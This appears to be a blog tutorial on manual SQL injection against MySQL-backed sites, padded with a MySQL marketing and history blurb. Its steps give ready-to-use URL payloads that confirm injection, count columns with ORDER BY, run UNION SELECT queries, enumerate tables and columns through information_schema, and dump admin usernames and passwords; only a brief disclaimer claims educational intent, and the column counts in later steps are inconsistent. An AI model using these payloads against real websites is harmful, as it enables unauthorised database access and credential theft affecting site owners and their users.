Manual PenTest of SQL injection on MYSQL.

MySQL is the world's most popular open source database software, with over 100 million copies of its software downloaded or distributed throughout its history. With its superior speed, reliability, and ease of use, MySQL has become the preferred choice for Web, Web 2.0, SaaS, ISV, Telecom companies and forward-thinking corporate IT Managers because it eliminates the major problems associated with downtime, maintenance and administration for modern, online applications.

Many of the world's largest and fastest-growing organizations use MySQL to save time and money powering their high-volume Web sites, critical business systems, and packaged software — including industry leaders such as Yahoo!, Alcatel-Lucent, Google, Nokia, YouTube, Wikipedia, and Booking.com.

The flagship MySQL offering is MySQL Enterprise, a comprehensive set of production-tested software, proactive monitoring tools, and premium support services available in an affordable annual subscription.

MySQL is a key part of LAMP (Linux, Apache, MySQL, PHP / Perl / Python), the fast-growing open source enterprise software stack. More and more companies are using LAMP as an alternative to expensive proprietary software stacks because of its lower cost and freedom from platform lock-in.

MySQL was originally founded and developed in Sweden by two Swedes and a Finn: David Axmark, Allan Larsson and Michael "Monty" Widenius, who had worked together since the 1980's. More historical information on MySQL is available on Wikipedia....

Note: This post is only for educational purposes,the author of this website will not be responsible for any kind of misuse..

Step 1:

How to Check vulnerability:

Let us take an  think that we have some site like this:http://www.target.com/images.php?id=1.Now to test if  vulnerable we add to the end of URL ' (quote),and that would be http://www.target.com/images.php?id=1'so if we get some error like"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near  at line 1"

Now from this we get to know that the website is running on MYSQL server.....

Step 2:

How to find number of columns:

To find number of columns we use statement ORDER BY (tells database how to order the result)so how to use it? Well just increment the number until we get an error.http://www.target.com/images.php?id=1 order by 1/* <-- no errorhttp://www.target.com/images.php?id=1 order by 2/* <-- no errorhttp://www.target.com/images.php?id=1 order by 3/* <-- no errorhttp://www.target.com/images.php?id=1 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)So,that means that it has only 3 columns and when we cause we got an error on 4.

Step 3:

How to check for UNION function:

With union function we can select more data in one SQL statement.i.e we have http://www.target.com/images.php?id=1 union all select 1,2,3/*NOTE: if /* not working or you get some error, then try --it's a comment and it's important for our query to work properly.(we already found that number of columns are 3 in section 2). )if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)

Step 4: 

How to check for MySQL version:

http://www.target.com/images.php?id=1 union all select 1,2,3,4/*let say that we have number 4 on the screen, now to check for versionwe replace the number 4 with @@version or version() and get something like 4.1.33-log or 5.0.45.The version should be greater than 5 , if its less than 5 you should guess the table name.

Step 5:

How to get table and column name:

http://www.target.com/images.php?id=1 union all select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()we get table names.check for table name admin of some login user.now to check column names.To check the columns replace the word “table” with columnhttp://www.target.com/images.php?id=1 union all select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=hex_valuenote: the table should be in hex value.(this works mostly)we get columns displayed on screen, user id, passwd etc...now to retrieve values use:http://www.target.com/images.php?id=1 union all select 1,concat(username,0x3a,password),3 from admin/*

It will show username and passwords on the screen..

Posted by: Anshuman kak